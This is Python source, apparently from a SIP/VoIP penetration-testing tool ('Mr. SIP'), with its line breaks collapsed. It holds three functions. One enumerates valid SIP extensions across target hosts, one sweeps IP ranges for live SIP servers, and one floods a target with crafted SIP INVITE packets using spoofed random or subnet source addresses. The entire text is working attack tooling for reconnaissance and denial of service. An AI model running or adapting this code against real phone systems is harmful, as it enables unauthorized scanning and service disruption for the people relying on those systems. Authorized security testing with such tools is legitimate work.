def sipEnumerator(): value_errors = [] conf.verb = 0 try: client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr'] except ValueError: value_errors.append( 'Please specify a valid interface name with --if option.') message_type = options.message_type.lower( ) if options.message_type else "subscribe" user_list = [ userName for userName in utilities.readFile(options.from_user).split("\n") if userName.isalnum() ] if len(user_list) <= 1: value_errors.append( "Error: From user not found. Please enter a valid From User list.") if options.target_network: target_networks = [options.target_network] else: content = utilities.readFile("ip_list.txt").split(";") if len(content[0]) <= 1: value_errors.append( "Error: Target IP not found. Please run SIP-NES first for detect the target IPs." ) with open('ip_list.txt', 'r') as f: target_networks = [line.split(';')[0] for line in f.readlines()] utilities.check_value_errors(value_errors) utilities.printInital("Enumeration", conf.iface, client_ip) # combination of all target_networks with user_IDs target_network__user_id = [(target_network, user_id) for target_network, user_id in itertools.product(target_networks, user_list)] global counter global workQueue run_event = threading.Event() thread_join_time = 0.001 print("running with {} threads".format(len(threadList))) for _ in threadList: thread = threading.Thread(target=sipenum_worker, args=(run_event, message_type, options.dest_port, client_ip)) thread.daemon = True threads.append(thread) _prompt_new = "\33[38;5;6m{} user IDs will be checked for {} target networks.\nThere will be {} packages generated. Do you want to continue? (y/n)\33[0m\n" try: continue_flag = raw_input( _prompt_new.format(len(user_list), len(target_networks), len(target_network__user_id))) except EOFError: print("STDIN is unavailable. Accepting answer as yes.") continue_flag = 'y' if continue_flag == 'y': for tn_ui in target_network__user_id: workQueue.put(tn_ui) for thread in threads: thread.start() # invoke the 'run()' function in the class try: while not workQueue.empty(): pass # Wait for queue to empty< except KeyboardInterrupt: print("\nCTRL+C pressed, terminating SIP-ENUM gracefully") run_event.set() run_event.clear() try: for t in threads: t.join(thread_join_time) except KeyboardInterrupt: print( "\nCTRL+C pressed, but Mr. SIP is already trying to terminate SIP-ENUM gracefully. Please be patient." ) for t in threads: t.join(thread_join_time) # call the threads, finish elif continue_flag == 'n': print("\33[38;5;6mTerminating by user input\33[0m") run_event.set() run_event.clear() exit(0) else: print("\33[38;5;6mAnswer not understood. Please answer y/n.\33[0m") run_event.set() run_event.clear() exit(0) print(("[!] " + str(counter) + " SIP Extension Found."))
def dosSmilator(): value_errors = [] conf.verb = 0 try: client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr'] client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask'] except ValueError: value_errors.append( 'Please specify a valid interface name with --if option.') message_type = options.message_type.lower( ) if options.message_type else "invite" utilities.check_value_errors(value_errors) utilities.promisc("on", conf.iface) utilities.printInital("DoS attack simulation", conf.iface, client_ip) i = 0 while i < int(options.counter): try: toUser = random.choice( [line.rstrip('\n') for line in open(options.to_user)]) fromUser = random.choice( [line.rstrip('\n') for line in open(options.from_user)]) spUser = random.choice( [line.rstrip('\n') for line in open(options.sp_user)]) userAgent = random.choice( [line.rstrip('\n') for line in open(options.user_agent)]) pkt = IP(dst=options.target_network) client = pkt.src if options.random and not options.library: client = utilities.randomIPAddress() if options.manual and not options.library: client = random.choice([ line.rstrip('\n') for line in open(options.manual_ip_list) ]) if options.subnet and not options.library: client = utilities.randomIPAddressFromNetwork( client_ip, client_netmask, False) send_protocol = "scapy" if options.library: send_protocol = "socket" sip = sip_packet.sip_packet(str(message_type), str(options.target_network), str(options.dest_port), str(client), str(fromUser), str(toUser), str(userAgent), str(spUser), send_protocol) sip.generate_packet() i += 1 utilities.printProgressBar(i, int(options.counter), "Progress: ") except (KeyboardInterrupt): utilities.promisc("off", conf.iface) print("Exiting traffic generation...") raise SystemExit print(( "\033[31m[!] DoS simulation finished and {0} packet sent to {1}...\033[0m" .format(str(i), str(options.target_network)))) utilities.promisc("off", conf.iface)
def networkScanner(): value_errors = [] conf.verb = 0 global counter try: client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr'] except ValueError: value_errors.append( 'Please specify a valid interface name with --if option.') message_type = options.message_type.lower( ) if options.message_type else "options" if options.target_network == None: value_errors.append( 'Please specify a valid target network with --tn option.') if 'txt' in options.from_user: from_user = [ userName for userName in utilities.readFile(options.from_user).split("\n") if userName.isalnum() ] else: from_user = [options.from_user] if 'txt' in options.to_user: to_user = [ userName for userName in utilities.readFile(options.to_user).split("\n") if userName.isalnum() ] else: to_user = [options.to_user] if message_type == 'invite' or message_type == 'options': pass # both fromUser and toUser should be accepted. elif message_type == 'register' or message_type == 'subscribe': to_user = [''] # toUser should be omitted if 'txt' in options.from_user or '.txt' in options.to_user: print( "\033[33m\nYou gave a list of user names ('{}', '{}') for SIP-NES. This is yet an experimental feature. (WIP) \033[0m" .format(options.from_user, options.to_user)) print( "\033[33mIf this was not what you wanted, specify user names with '--to' and '--from' arguments \033[0m \n" ) utilities.check_value_errors(value_errors) if "-" in options.target_network: host_range = options.target_network.split("-") host, last = ipaddress.IPv4Address(unicode( host_range[0])), ipaddress.IPv4Address(unicode(host_range[1])) if ipaddress.IPv4Address(host) > ipaddress.IPv4Address(last): value_errors.append( "Error: Second IP address ({}) must bigger than first IP address ({})." .format(ipaddress.IPv4Address(host), ipaddress.IPv4Address(last))) else: target_networks = [ utilities.decimal_to_octets(host) for host in range(int(ipaddress.IPv4Address(host)), int(ipaddress.IPv4Address(last) + 1)) ] target_network__fromUser__toUser = [ (tn, fu, tu) for tn, fu, tu in itertools.product( target_networks, from_user, to_user) ] elif "/" in options.target_network: target_networks = [ host for host in ipaddress.IPv4Network(unicode(options.target_network), strict=False).hosts() ] target_network__fromUser__toUser = [ (tn, fu, tu) for tn, fu, tu in itertools.product( target_networks, from_user, to_user) ] elif len(from_user) > 1 or len(to_user) > 1: print( "\033[33mCalculating all permutations of target network ('{}'), from user name list ('{}') and to user name list ('{}').\033[0m" .format(options.target_network, options.from_user, options.to_user)) print( "\033[33mDepending on the list sizes, this might take a long time.\033[0m \n" ) target_network__fromUser__toUser = [ (tn, fu, tu) for tn, fu, tu in itertools.product( [options.target_network], from_user, to_user) ] utilities.check_value_errors(value_errors) utilities.printInital("Network scan :", conf.iface, client_ip) thread_join_time = 0.01 if '-' in options.target_network or '/' in options.target_network or ( len(from_user) > 1 or len(to_user) > 1): # Create new threads run_event = threading.Event() for _ in threadList: thread = threading.Thread(target=sipnes_worker, args=(run_event, message_type, options.dest_port, client_ip)) thread.daemon = True threads.append(thread) _prompt_new = "\33[38;5;6m{} User names (to and from) will be checked for {} target networks.\nThere will be {} packages generated. Do you want to continue? (y/n)\33[0m\n" try: continue_flag = raw_input( _prompt_new.format( len(from_user) + len(to_user), len(target_networks), len(target_network__fromUser__toUser))) except EOFError: print("STDIN is unavailable. Accepting answer as yes.") continue_flag = 'y' if continue_flag == 'n': print("\33[38;5;6mTerminating by user input\33[0m") run_event.clear() exit(0) elif continue_flag != 'y' and continue_flag != 'n': print("\33[38;5;6mAnswer not understood. Please answer y/n.\33[0m") run_event.clear() exit(0) for tn_fu_tu in target_network__fromUser__toUser: workQueue.put(tn_fu_tu) for thread in threads: thread.start() try: while not workQueue.empty(): pass except KeyboardInterrupt: print("\nCTRL+C pressed, terminating SIP-NES gracefully") run_event.set() run_event.clear() try: for t in threads: t.join(thread_join_time) except KeyboardInterrupt: print( "\nCTRL+C pressed, but Mr. SIP is already trying to terminate SIP-NES gracefully. Please be patient." ) for t in threads: t.join(thread_join_time) # call the threads, finish else: if len(from_user) == 1 and len(to_user) == 1: host = options.target_network sip = sip_packet.sip_packet(message_type, host, options.dest_port, client_ip, from_user=from_user[0], to_user=to_user[0], protocol="socket", wait=True) result = sip.generate_packet() if result["status"]: # and result["response"]['code'] == 200: utilities.printResult(result, host, options.ip_list) counter += 1 print(( "\033[31m[!] Network scan process finished and {0} live IP address(s) found.\033[0m" .format(str(counter))))